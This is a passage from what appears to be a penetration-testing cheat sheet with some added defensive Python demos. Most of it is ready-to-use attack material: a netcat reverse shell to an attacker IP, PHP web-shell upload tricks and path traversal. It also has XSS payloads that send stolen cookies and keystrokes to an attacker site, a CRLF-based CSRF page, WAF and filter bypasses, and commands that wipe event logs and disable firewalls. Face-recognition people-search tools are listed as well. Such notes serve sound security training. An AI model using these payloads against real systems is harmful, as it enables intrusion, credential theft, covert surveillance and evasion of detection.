- route - displays the routing table
- run persistence <with_parameters> - installs a backdoor (persistence help); the script is deprecated in current Metasploit in favour of the post/windows/manage/persistence_exe module
- search - search for files, modules
- show_mount - lists physical and logical disks
- sysinfo - displays brief information about the remote system
- upload - uploads files from the local machine to the remote machine
- webcam_chat - organize a video chat
- webcam_snap - takes a snapshot from the remote built-in camera
- webcam_stream - obtains a video stream from the remote built-in camera
- run post/multi/recon/local_exploit_suggester - recon for privesc: lists the local exploit modules whose checks match the target
- load kiwi - loads the kiwi extension (Mimikatz) into the session
- Clearing log files (note that clearing the Security log itself leaves event 1102, "The audit log was cleared", and forwarded events are already gone):
- wevtutil cl Application
- wevtutil cl System
- wevtutil cl Security
OR check the firewall settings to find the location of the firewall log file
- netsh firewall show config (old command)
- netsh advfirewall show currentprofile (MS recommends this command) -> cd to the log file directory, more file.log to read it -> disable the firewall
- netsh firewall set opmode disable - disables the firewall (old command)
- netsh advfirewall set currentprofile state off
- del file.log
- Viewing System Information
- systeminfo - displays system information and installed patches
- net user - lists local users
- whoami /all - provides information about the current user, including group memberships and privileges
- driverquery - lists installed drivers
- Network Settings
- ipconfig /all - shows network settings
- ipconfig /displaydns - display cached DNS records
- arp -a - lists IP addresses that the computer has communicated with
- netstat - shows established connections
- netstat -a - lists open ports
- netstat -ao - displays open ports and the associated process IDs
- netstat -abo - lists open ports, associated process IDs, and their names
- netstat -r - shows the routing table
- Working with Services
- tasklist - lists current processes
- taskkill /f /pid "process_number" - terminates a process
- schtasks - displays scheduled tasks
- sc query - lists all services
- sc query "service_name" - checks the status of a service
- sc start/stop "service_name" - starts or stops service
- net start - lists running services
- Working with the File System
- cd - navigates through the file system
- dir - lists files and folders in the current directory
- dir /ah - displays hidden files and folders
- dir /ad - lists folders only
- dir /b /s "folder and search term" - searches for files based on a keyword
- mkdir - creates a new folder
- Netcat reverse shell through a named pipe (works with nc builds that lack -e; start nc -lvnp <ATTACKER_PORT> on your side first):
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> <ATTACKER_PORT> >/tmp/f
- git log - show the commit history
- git diff - show the differences between commits
- git blame - show who changed each line of a file and when
- git checkout - switch to a commit or branch
- git branch - show branches
- git tag - show all tags in the repo
- Copy id_rsa
- chmod 600 id_rsa to set the right permissions (ssh refuses to use a private key that is readable by others)
- Connect
- For Linux
- For Windows
- %0a to bypass regex rules (a leading newline can defeat a line-anchored pattern while the underlying path handling still sees the traversal):
http://vuln.host/some.php?file=%0a../../../../etc/passwd
- DotDotPwn can help with testing traversal variants (sudo apt install dotdotpwn)
- Magic Bytes (the first bytes a server-side check compares when "validating" an image):
- PNG -
89 50 4E 47 0D 0A 1A 0A
- JPEG -
FF D8 FF
- GIF (GIF89a; GIF87a is 47 49 46 38 37 61) -
47 49 46 38 39 61
- Upload a normal image file, intercept the request and try:
- Changing the file extension to php5 and similar alternatives (phtml, phar)
- Double extensions (shell.php.jpg)
- A null byte in the name (shell.php%00.jpg; only old PHP versions)
- Changing the Content-Type to image/jpeg while keeping PHP content
- Injecting through EXIF data. The image stays valid, so magic-byte checks pass; the code only runs if the server is later made to execute the file as PHP (one of the extension tricks above):
exiftool -comment="<?php system(\$_GET['cmd']); ?>" file.png
echo '<?php system($_GET["cmd"]); ?>' >> file.jpeg
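An added example (not from the original page) of why a magic-bytes check alone does not stop the EXIF/append trick: the file really is a JPEG by signature, so a sniff-only validator accepts it, while a content scan still finds the PHP tag. The sample file and the toy validator are constructed for the demo; the signature table is the one above plus GIF87a.

```python
import re

# Signatures from the table above, plus GIF87a (the table's bytes are GIF89a)
MAGIC = {
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "jpeg": bytes.fromhex("FFD8FF"),
    "gif89a": b"GIF89a",
    "gif87a": b"GIF87a",
}
# Markers that matter if the "image" is ever interpreted as code or HTML
SCRIPT_RE = re.compile(rb"<\?php|<script\b|\bon(?:error|load)\s*=", re.IGNORECASE)
IMAGE_EXT = {"png", "jpg", "jpeg", "gif"}


def sniff(data):
    """Return the image type whose magic bytes the data starts with, or None."""
    for kind, sig in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def has_embedded_code(data):
    return SCRIPT_RE.search(data) is not None


def make_polyglot(kind, payload):
    """Constructed upload: a valid signature, some filler, then the payload appended
    the way `echo ... >> file.jpeg` above does it."""
    return MAGIC[kind] + b"\x00" * 16 + payload


def validate_upload(filename, data, magic_only):
    """Toy upload check. magic_only=True mimics a server that only sniffs the header."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    if kind is None:
        return "reject: unknown signature"
    if ext not in IMAGE_EXT:
        return "reject: extension %r not an image" % ext
    if not magic_only and has_embedded_code(data):
        return "reject: embedded code inside %s" % kind
    return "accept: %s" % kind


PAYLOAD = b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    poly = make_polyglot("jpeg", PAYLOAD)
    for name, magic_only in (("shell.jpeg", True), ("shell.jpeg", False), ("shell.php", True)):
        print(name, "magic_only" if magic_only else "content scan", "->",
              validate_upload(name, poly, magic_only))
```

Even the content scan is only a heuristic (the marker can be split or encoded). The robust fix on the server side is to re-encode the upload with an image library so that comments, EXIF and trailing bytes never reach disk, and to store uploads where nothing executes them.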
- Proof Of Concept (PoC). The simplest payloads, where all you want to do is demonstrate that you can execute script on the page:
<scRIPt>alert('Success XSS!');</sCriPt>
print()
prompt()
<img src=x onerror=al
ert()>
<img src=x onerror="window.location.href='http://some.site'">
<svg/onload=confirm(document.cookie)>
- XSS -> LFI (only where the page itself runs from file:// or inside a wrapper that allows it, e.g. a headless browser rendering user-supplied HTML to PDF; a normal web origin cannot read file:// URLs):
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>
Session Stealing -
<script>fetch('url/steal?cookie=' + btoa(document.cookie));</script>
Details of a user's session, such as login tokens, are often kept in cookies on the target's machine. The JavaScript above takes the target's cookie, base64-encodes it to ensure successful transmission and then sends it to a website under the attacker's control to be logged. Once the attacker has these cookies, they can take over the target's session and be logged in as that user (unless the session cookie is HttpOnly, in which case document.cookie does not contain it).
Key Logger -
<script>document.onkeypress = function(v) {fetch('url/log?key=' + btoa(v.key));}</script>
The code above acts as a key logger: anything typed on the page is forwarded to a website under the attacker's control. This could be very damaging if the page the payload was injected into accepts user logins or credit card details.
Business Logic -
<script>user.changeEmail('e@mail.com');</script>
This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail().
Polyglots -
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('Success XSS!'))//%0D%0A%0d%0a//\x3csVg/\x3e
An XSS polyglot is a string of text that can escape attributes, tags and bypass filters all in one. It would have executed in each of the injection contexts above (tag body, attribute value, script block, URL), so it is a good first probe when the context is unknown.
- XSS bypassing a WAF (newlines instead of spaces, a unicode escape inside the function name, and an HTML numeric entity for the closing parenthesis):
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
- Try uploading a file whose name carries the payload, for places that render the file name unescaped:
<img src=1 onerror=alert()>.png
- XSS through an SVG file (SVG is XML and may contain script; it fires when the file is opened directly or embedded inline rather than via <img>):
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg>
- XSS through image metadata. This only works if the server ends up serving the file with
Content-Type: text/html
(or lets the browser sniff the type); the comment is then rendered as HTML:
exiftool file.jpeg -Comment='<script>alert(1)</script>'
- Tips for exploiting:
- try to upload a file (image, svg, html) that contains an XSS payload inside
- Description of XSS payloads here
- CSRF with CRLF injection: the img src requests a URL whose parameter is reflected into a response header, so the encoded CR LF injects a Set-Cookie that sets the csrf cookie to the value the attacker already placed in the form (the form's csrf value must equal the injected one; this defeats a double-submit cookie check). SameSite=None lets that cookie accompany the cross-site POST, and onerror submits the form once the "image" fails to load:
<html>
<body>
<form action="https://ACTION_URL.COM" method="POST">
<input type="hidden" name="email" value="ATTACKER@MAIL.HACK" />
<input type="hidden" name="csrf" value="YOUR_CSRF" />
</form>
<img src="https://URL_WITH_PARAMETER_ASSIGNMENT/?PARAM=TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None" onerror="document.forms[0].submit();" />
</body>
</html>
- Auto-submit without a Referer header, for targets that validate the Referer only when it is present:
<meta name="referrer" content="never">
<script type="text/javascript">
document.forms[0].submit();
</script>
- Allowlist bypass for redirect/URL parameters: a check that only looks for the trusted domain somewhere in the value is fooled by userinfo syntax, because the browser treats everything before the @ as credentials and connects to the host after it:
?u=example2\.com ❎
?u=example\.com@example2\.com ✅
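Added example, not from the page: why the second form passes. A regex that only checks that the trusted domain appears in the value accepts https://example.com@example2.com/, but a URL parser puts everything before the @ into userinfo and reports example2.com as the host, which is where the browser connects. The fix compares the parsed hostname against an exact allowlist. ALLOWED_HOST and the test URLs are assumptions made for the demo.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOST = "example.com"   # assumed trusted redirect target


def naive_allow(url):
    """The check the \\. filter above represents: the trusted domain just has to occur in the value."""
    return re.search(r"example\.com", url) is not None


def hostname_of(url):
    """The host a client will actually connect to: userinfo (user:pass@) is stripped by the parser."""
    return (urlsplit(url).hostname or "").lower()


def strict_allow(url):
    """Exact match on the parsed hostname and an explicit scheme; no substring logic."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and hostname_of(url) == ALLOWED_HOST


CASES = [  # constructed inputs mirroring the two lines above, plus two common variants
    "https://example2.com/",
    "https://example.com@example2.com/",
    "https://example.com/",
    "https://example.com.evil.net/",
]


def evaluate():
    """Map each URL to (naive verdict, strict verdict)."""
    return {u: (naive_allow(u), strict_allow(u)) for u in CASES}


if __name__ == "__main__":
    for url, (naive, strict) in evaluate().items():
        print(f"{url:40} host={hostname_of(url):20} naive={naive!s:5} strict={strict}")
```

Only https://example.com/ passes the strict check; the userinfo trick and the subdomain-lookalike both pass the naive one. Note that urlsplit is the conservative parser here; browsers additionally tolerate backslashes and other oddities, so an allowlist should compare the hostname that the same component which performs the redirect will use.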
- Polyglot for server-side template injection (breaks the syntax of most template engines at once, so an error or altered output reveals that input reaches a template):
${{<%[%'"}}%\
- CRLF injection (HTTP header splitting) payload:
%0D%0A
- %0D — CR (Carriage Return)
- %0A — LF (Line Feed)
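An added example (not from the original page) of the %0D%0A payload against a server that reflects a parameter into a response header, which is the situation the CSRF trick above relies on: the decoded CR LF ends the Location line and the client parses the remainder as a new Set-Cookie header. The vulnerable and hardened reflectors are constructed toys; many frameworks already reject CR and LF in header values, so this mostly hits hand-written header code.

```python
from urllib.parse import unquote


def reflect_vulnerable(value):
    """Server that copies a query parameter into a response header without stripping CR/LF."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /?PARAM=" + value + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def reflect_safe(value):
    """Hardened version: refuse anything that could terminate the header line."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return reflect_vulnerable(value)


def parse_headers(raw):
    """How a client sees the response: status line, then one 'Name: value' per CRLF line up to the blank line."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    return status, [tuple(line.split(": ", 1)) for line in lines]


def safe_rejects(value):
    try:
        reflect_safe(value)
        return False
    except ValueError:
        return True


# The payload from the CSRF example above, decoded once as a web server would decode the query string
INJECTED = unquote("TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None")


def demo():
    """Headers the client ends up with after the vulnerable reflector handles the payload."""
    _status, headers = parse_headers(reflect_vulnerable(INJECTED))
    return dict(headers)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
    print("safe reflector rejects payload:", safe_rejects(INJECTED))
```

The Location value is cut down to "/?PARAM=TEST" and a Set-Cookie header the application never wrote appears in its place, which is exactly what the CSRF form above needs. The hardened reflector's rule is the one every header-writing API should enforce: no CR or LF, ever, in a header value.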
https://sitereport.netcraft.com/?url=<TARGET_URL>
- Fagan Finder - is an excellent source of information. You enter a query, then click on the desired source. Then you are redirected to the relevant page. The most important thing is that it shows how many sources there can be and how diverse they can be: from the Library of Congress website to leak publication services
- Intelligence X - it not only searches for leaks but also helps navigate other OSINT tools. Services for email verification, DNS search - you'll find them here too. Go to the Tools section and search specifically
- Social Catfish - a people search engine with facial recognition; it can search by face, name, email, address and username
- Spokeo - is a database used for identifying people and providing accurate information about them. It is constantly updated and boasts over 6 million consumers, 130 million property records, 600 million legal records, and over 120 social networks, making it an ideal people search system for personal and business use
- Google Image Search - uses the powerful Google Bot to scan all publicly accessible websites for images to create the largest and most frequently updated image database in the world
- PimEyes - is one of the best facial recognition search engine tools that allows you to perform in-depth image searches on the internet. Advanced convolutional neural networks analyze the image you upload to find objects and match them with the database
- FaceCheck.ID - one of the best reverse image search tools for facial recognition. It identifies the faces in the photo you upload and then finds similar faces in social media posts, online videos, fraudulent accounts, websites, news and blog pages, and product marketing
Tools
- GitHub Tools
- Browsers extensions. Note: Chrome extensions also work with Brave Browser
- Burp Suite Extensions
- Kali Tools
- Platforms for hacking and pentesting
GitHub Tools
My GitHub stars, where I categorized GitHub tools. Some of the most awesome tools (IMHO):
- BruteForce & Wordlists
- Enumeration
- OSINT
- Payloads
- Privilege Escalation
- Social Engineering
- Looking for exploits and vulnerabilities
- Another
BruteForce and Wordlists
- Active Directory Wordlists contains User.txt and Pass.txt
- BruteForce Database
- YAWR. Yet Another Wordlists Repo. Contains OS,RECON,WEB,brute folders
- Crunch. One of many powerful tools for creating an offline wordlist. With crunch you specify the minimum and maximum length and the character set; the following example creates a wordlist of every 3-character combination of the characters 12345qwerty (11^3 = 1331 entries). The -o argument saves the output to a file.
Example:
crunch 3 3 12345qwerty -o crunch.txt
- Top wordlists by DanielMiessler
- DNS asynchronous bruteforce
- Hash Identifier. Tool for hash identification. Python file. Powerful. User-friendly interface.
- Kerberos bruteforcing
- Username generator. Could help create a list with most of the possible combinations if we have a first name and last name. git clone it, then python3 username_generator.py -h shows the tool's help message and optional arguments.
- Wordlists by kkrypt0nn. A collection of wordlists for many different usages
Enumeration
- WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools
- Certipy. Tool for Active Directory Certificate Services enumeration and abuse
- Fuzzer
- fuzzdb
- Knock.py - subdomain scanner
- Linux smart enumeration
- Sublist3r. Subdomain enumeration python tool
OSINT
- Fast Google Dorks Scan
- h8mail is an email OSINT and breach hunting tool
- theHarvester. E-mails, subdomains and names Harvester
Payloads
- All kind of payloads and bypasses
- Payloads for Unix and Windows OS
- XSS-LOADER. All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER
- XSS payloads
Privilege Escalation
- Privilege Escalation (LinPEAS & WinPEAS)
- Enumy. Linux post exploitation privilege escalation enumeration
- Linux PrivEsc Check Script
- Linux PrivEsc
- Mimikatz. Windows credential extraction (used in PrivEsc and lateral movement)
- Postenum is a Linux enumeration and privilege escalation tool
- RogueWinRM. Win PrivEsc (SeImpersonatePrivilege to SYSTEM via a fake WinRM listener)
Social Engineering
Looking for exploits and vulnerabilities
- Searchsploit - provides direct access to the Exploit Database from the Kali Linux terminal. Users can utilize powerful search commands to quickly discover exploits and vulnerabilities. This tool is an indispensable assistant for security professionals working in the Kali Linux environment
- getsploit - combines the functionality of searchsploit with the ability to download exploits. It allows users to conduct online searches across databases such as Exploit-DB, Metasploit, and Packetstorm. Additionally, it provides the capability to download exploit source code directly, making the search and retrieval of necessary data for pentesting simple and effective
- CVEMap - a tool from Projectdiscovery designed for quick and convenient searching across all known vulnerability databases
- Pompem - a tool pre-installed in Parrot OS, automates the process of searching for exploits and vulnerabilities. It uses an advanced search system to check databases such as PacketStorm Security, CXSecurity, ZeroDay, Vulners, and NVD
- SiCat - stands out for its comprehensive approach to exploit searching. It adeptly extracts information about exploits from open sources and local repositories
Another
- Wapiti. Web vulnerability scanner
- Bearer. Scans source code against top security and privacy risks
- CrackMapExec. A swiss army knife for pentesting networks
- BloodHound. Six Degrees of Domain Admin
Cewl can be used to crawl a website and extract strings or keywords, which makes it a powerful tool for generating a wordlist specific to a given company or target. Consider the following example:
cewl -w list.txt -d 5 -m 5 http://target_site.com
-w writes the output to a file, here list.txt
-m 5 gathers only strings (words) of 5 characters or more
-d 5 sets the depth of web crawling/spidering (default 2)
http://target_site.com is the URL that will be crawled
As a result, you now have a decently sized wordlist of words relevant to the specific enterprise, such as names, locations and a lot of their business lingo. The same wordlist can also be used to fuzz for usernames.
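To show what the -m filter above actually does, here is an added Python example (not part of this page or of cewl itself) that pulls the visible words out of one HTML page, drops script/style bodies, keeps only words of at least min_length letters and orders them by frequency. The sample page is constructed for the example; cewl additionally follows links to the -d depth, which this single-page extractor does not. The same counts are handy on the defensive side for checking whether staff passwords are built from company lingo.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List


class _VisibleText(HTMLParser):
    """Collects the text a visitor would read, skipping <script> and <style> bodies."""

    SKIP = {"script", "style"}

    def __init__(self) -> None:
        super().__init__()
        self._skip_depth = 0
        self.chunks: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def word_counts(html: str, min_length: int = 5, lowercase: bool = False) -> Dict[str, int]:
    """Count words of at least min_length letters in the visible text of one page.

    Case is kept by default, as cewl does; lowercase=True folds 'Robotics' and 'robotics'.
    """
    parser = _VisibleText()
    parser.feed(html)
    text = " ".join(parser.chunks)
    counts: Dict[str, int] = {}
    # A word starts and ends with a letter; apostrophes/hyphens are allowed inside.
    for word in re.findall(r"[A-Za-z][A-Za-z'-]*[A-Za-z]|[A-Za-z]", text):
        if lowercase:
            word = word.lower()
        if len(word) >= min_length:
            counts[word] = counts.get(word, 0) + 1
    return counts


def wordlist(html: str, min_length: int = 5, lowercase: bool = False) -> List[str]:
    """Most frequent words first, ties in alphabetical (ASCII) order."""
    counts = word_counts(html, min_length, lowercase)
    return sorted(counts, key=lambda w: (-counts[w], w))


# Constructed sample page; "ignoredword" sits inside <script> and must not appear.
SAMPLE_PAGE = """<html><head><title>Acme Robotics - Careers</title>
<script>var tracking = "ignoredword";</script></head>
<body><h1>Welcome to Acme Robotics</h1>
<p>Our Springfield warehouse ships robotics kits worldwide.
Acme Robotics is hiring engineers for the Springfield site.</p></body></html>"""

if __name__ == "__main__":
    for word in wordlist(SAMPLE_PAGE, min_length=5):
        print(word)
```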
Hexeditor
Tool for changing file signatures. Link to the Wikipedia list of file signatures.
- Lynis. Check Linux security
- Pspy. Great for enumeration of Linux systems in CTFs and more.
- Hash Identifier. Python script. Powerful, user-friendly interface.
Browser extensions
- Wappalyzer (FireFox | Chrome) - Identifies the CMS, JS libraries, frameworks and other technologies used on the site
- Foxy Proxy (FireFox | Chrome) - Fast proxy switching, for example to use with Burp Suite
- Rested (FireFox) - Quick request sender. Useful with APIs
- Altair (FireFox | Chrome) - Helps with GraphQL requests
- HackTools (FireFox | Chrome) - is a web extension facilitating your web application penetration tests, it includes cheat sheets as well as all the tools used during a test such as XSS payloads, Reverse shells to test your web application
- Cookie Editor (FireFox | Chrome) - Allows you to change, delete, add cookie values for various testing purposes. Can be tested for access control errors, privilege escalation, etc
- Hackbar (FireFox | Chrome) - Contains payloads for XSS attacks, SQL injections, WAF bypass, LFI, etc
- ModHeader (FireFox | Chrome) - Helps to easily change HTTP request and response headers in the browser
- User-Agent Switcher (FireFox | Chrome)
- Wayback Machine (FireFox | Chrome) - Official Internet Archive Wayback Machine Browser Extension. Non official for FireFox
- Firefox Multi-Account Containers. Lets you keep parts of your online life separated into color-coded tabs.
- Beautifier & Minify (FireFox | Chrome) - Brings readable CSS, HTML and JavaScript code
- BuiltWith (FireFox | Chrome) - Get web app technologies
- DotGit (FireFox | Chrome) - An extension to check for the presence of .git on websites you visit. Also checks open .env files, security.txt and more
- Email Extractor (FireFox | Chrome) - Automatically saves email addresses from the web pages you visit. Helps with social engineering attacks, brute force attacks, etc
- Exif-Viewer (FireFox | Chrome) - Help to check photo metadata
- Fake Filler (FireFox | Chrome) - Simplifies and speeds up testing of fillable forms by developers and testers. Helps to populate all input forms (text fields, areas, dropdowns, etc.) with fake and randomly generated data
- Knoxss (FireFox) - Finds XSS vulnerabilities. Community Edition and Pro Version
- Nimbus Screenshot (FireFox | Chrome) - To make screenshot
- Privacy Badger (FireFox | Chrome) - Automatically learns to block invisible trackers
- Temp Mail (FireFox) - Temporary disposable email address. Protect your email from spam, bots and phishing with Temp-Mail
- Retire.js (FireFox | Chrome) - Displays the presence of vulnerable JavaScript libraries. This helps to find known vulnerabilities in JS and some CVEs affecting sites with vulnerable JS libraries
- Shodan (FireFox | Chrome) - The Shodan plugin tells you where the website is hosted (country, city), who owns the IP and what other services/ ports are open
- Ublock Origin (FireFox | Chrome) - An efficient wide-spectrum content blocker
- Chaff (Chrome) - Generate fake traffic
- TruffleHog Chrome Extension (FireFox | Chrome) - Scans the websites you visit looking for API keys and credentials and notifies you if they are found
- OWASP Penetration Testing Kit (FireFox | Chrome) - Helps with checks for common bugs
- Vulners Web Scanner (FireFox | Chrome) - Tiny and passive vulnerability scanner based on vulners.com vulnerability database
- Web Developer (FireFox | Chrome) - Adds a toolbar button with various web developer tools
- Panic Button (FireFox | Chrome) - Quickly hide all browser windows with a click of a button
Burp Suite Extensions
- Autorize helps to detect authorization vulnerabilities
- Logger++ allows advanced filters to be defined to highlight interesting entries or filter logs to only those which match the filter
- PyCrypt enables users to encrypt and decrypt requests and response for manual and automated application penetration testing
- JWT Editor. An extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs)
- Software Vulnerability Scanner - This extension displays public vulnerabilities for applications detected in the traffic proxied by Burp. Essentially, it acts as a layer between Burp and the API of this excellent vulnerability aggregator
- Backslash Powered Scanner - Enhances Burp's active scanner using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
- CSTC, Modular HTTP Manipulator - CyberChef integrated in BurpSuite with live modification of requests at your fingertips
- SQLiPy - A tool that integrates Burp Suite with SQLMap using the SQLMap API to check for SQL injection vulnerabilities
- Active Scan++ - Expands the range of checks performed by the active and passive scanners. It identifies vulnerabilities such as cache poisoning, DNS rebinding, various injections, and also performs additional checks to detect XXE injections and more
- Turbo Intruder - A faster alternative to Intruder equipped with a scriptable engine for sending a large number of HTTP requests and analyzing the results. Useful when speed is required
- Bypass WAF - A tool for bypassing web application firewalls (WAFs)
- BurpJS Link Finder - Helps identify and discover links based on JavaScript in web applications
- 403 Bypasser Extension - A tool designed to bypass 403 errors commonly encountered when attempting to access restricted areas of a website
- InQL to assist in your GraphQL security testing efforts
- Hackvertor is a tag-based conversion tool that supports various escapes and encodings including HTML5 entities, hex, octal, unicode, url encoding etc
- OpenAPI Parser. Extension streamlines the process of assessing web services that use OpenAPI-based APIs
- JS Link Finder. Extension for passively scanning JavaScript files for endpoint links. Can export results to a text file and exclude specific JS files, e.g. jquery, google-analytics (Professional)
- Content Type Converter. This extension converts data submitted within requests between various common formats:
- JSON To XML
- XML to JSON
- Body parameters to JSON
- Body parameters to XML
- Param miner. Extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities
- Pentest Mapper. An extension that integrates the Burp Suite request logging with a custom application testing checklist
- Piper makes integrating external tools into Burp easier
Kali Tools
- Name That Hash - Instantly name the type of any hash (with hashcat command)
- wafw00f - This package identifies and fingerprints Web Application Firewall (WAF) products
- gowitness is a website screenshot utility, that uses Chrome Headless to generate screenshots of web interfaces using the command line
- Commix is an open source penetration testing tool for command injections
name-that-hash --help
wafw00f -h
Platforms for hacking and pentesting
Privilege Escalation
Enumeration is key!
Linux
Some advice for Linux privilege escalation:
- Check which user you are running as:
whoami
- Check which groups the running user belongs to:
id
- Check the server's hostname:
hostname
- Check which subnet you landed in:
ifconfig
or
ip a
- Check the kernel version:
uname -a
and the OS version:
cat /etc/os-release
- Check the screen version:
screen -v
- Check the .ssh folder in /home/<USERNAME>/.ssh or /root/.ssh
- Check all environment variables:
env
- Check which login shells exist on the server:
cat /etc/shells
- Check cron jobs and init scripts:
ls -la /etc/cron.d
ls -la /etc/init.d
- Check setuid and setgid files:
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -perm -4000 2>/dev/null
- Find world-writable files for every user:
find / -perm -2 -type f 2>/dev/null
- Check for NOPASSWD sudo commands:
sudo -l
- Check PATH:
echo $PATH
- Check the routing table:
route
or
netstat -rn
- Check the ARP table:
arp -a
- Check the process environment:
cat /proc/self/environ
- Check history (search all history files):
history
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history
cat ~/.php_history
cat ~/.atftp_history
cat ~/.*history | less
- Check executable files in the home directory, /var/www or similar locations, and check their rights:
ls -la
- Check additional information about the host itself, such as the CPU type/version:
lscpu
- Check the logrotate version:
logrotate --version
This GitHub tool can help with privesc. Look at:
- Open ports
- .bat and .bak files
- Interesting permissions
Windows
systeminfo
- information about the target system
cmdkey /list
- list any saved credentials
Tips
- If the request carries JSON, try changing the JSON to XML
- Command Injection
If you find Command Injection and the WAF blocks keywords, you can attempt a bypass method by adding a backslash and a newline character between the blacklisted words.
c\%0aat /et\%0ac/pas\%0aswd
- If the target uses SVG files, try uploading an SVG with an XSS or XML payload
- Interesting file locations:
- Windows hashes:
- Local computer:
- File: %systemroot%\system32\config\SAM
- Registry: HKEY_LOCAL_MACHINE\SAM
- File: %systemroot%\system32\config\SECURITY
- Registry: HKEY_LOCAL_MACHINE\SECURITY\SAM
- Active Directory:
- %systemroot%\ntds\ntds.dit
- Identifying the algorithm from the first block of the hash:
- Salted MD5: $1$...
- SHA-256: $5$...
- SHA-512: $6$...
- BCrypt: $2a$...
- Scrypt: $7$...
- Argon2: $argon2i$...
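The prefix table above is easy to automate. The following is an added Python example (not from this page or from any of the tools it lists) that parses a Modular Crypt Format hash into its $id$, algorithm name and cost parameters, then audits /etc/shadow-style lines for locked accounts, legacy algorithms and low work factors. The prefix map extends the page's list with the common variants $2b$/$2y$ (bcrypt), $argon2d$/$argon2id$ (Argon2) and $y$ (yescrypt); the audit thresholds and the sample shadow lines are this example's own, and the hashes in them are placeholders.

```python
from typing import Dict, Optional

# $id$ prefix -> algorithm name. Page's list plus common variants (assumption:
# $2b$/$2y$ bcrypt, $argon2d$/$argon2id$ Argon2, $y$ yescrypt).
PREFIXES: Dict[str, str] = {
    "1": "Salted MD5 (md5crypt)",
    "5": "SHA-256 crypt",
    "6": "SHA-512 crypt",
    "2a": "bcrypt",
    "2b": "bcrypt",
    "2y": "bcrypt",
    "7": "scrypt",
    "y": "yescrypt",
    "argon2i": "Argon2i",
    "argon2d": "Argon2d",
    "argon2id": "Argon2id",
}

# Audit thresholds chosen for this example.
WEAK_ALGORITHMS = {"Salted MD5 (md5crypt)"}
MIN_BCRYPT_COST = 10
MIN_SHA_ROUNDS = 5000


def identify_hash(h: str) -> Dict[str, object]:
    """Parse a Modular Crypt Format string into id, algorithm name and cost parameters."""
    if not h.startswith("$"):
        return {"id": None, "algorithm": None, "cost": None}
    fields = h.split("$")[1:]            # drop the empty element before the leading '$'
    ident, rest = fields[0], fields[1:]
    return {"id": ident, "algorithm": PREFIXES.get(ident), "cost": _cost_params(ident, rest)}


def _cost_params(ident: str, rest: list) -> Optional[Dict[str, int]]:
    if ident in ("2a", "2b", "2y") and rest:
        return {"cost": int(rest[0])}                          # $2b$12$<salt+hash>
    if ident in ("5", "6"):
        if rest and rest[0].startswith("rounds="):
            return {"rounds": int(rest[0][len("rounds="):])}   # $6$rounds=N$salt$hash
        return {"rounds": 5000}                                # glibc default when omitted
    if ident.startswith("argon2") and len(rest) >= 2:
        # $argon2id$v=19$m=65536,t=3,p=4$salt$hash -> memory, time, parallelism
        return {k: int(v) for k, v in (kv.split("=") for kv in rest[1].split(","))}
    return None


def audit_shadow(text: str) -> Dict[str, str]:
    """Give a verdict per account for /etc/shadow-style lines (user:hash:...)."""
    verdicts: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        if field == "" or field.startswith(("!", "*")):
            verdicts[user] = "locked or no password"
            continue
        info = identify_hash(field)
        algo, ident, cost = info["algorithm"], info["id"], info["cost"]
        if algo is None:
            verdicts[user] = "unknown format"
        elif algo in WEAK_ALGORITHMS:
            verdicts[user] = "weak algorithm: " + algo
        elif algo == "bcrypt" and cost["cost"] < MIN_BCRYPT_COST:
            verdicts[user] = "low bcrypt cost: %d" % cost["cost"]
        elif ident in ("5", "6") and cost["rounds"] < MIN_SHA_ROUNDS:
            verdicts[user] = "low rounds: %d" % cost["rounds"]
        else:
            verdicts[user] = "ok: " + algo
    return verdicts


# Constructed sample; the hash bodies are placeholders, not real password hashes.
SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$hashhash:19000:0:99999:7:::
legacy:$1$saltsalt$hashhash:19000:0:99999:7:::
svc:$2b$04$saltsaltsaltsaltsaltsahashhashhashhashhashhashhashhash:19000:0:99999:7:::
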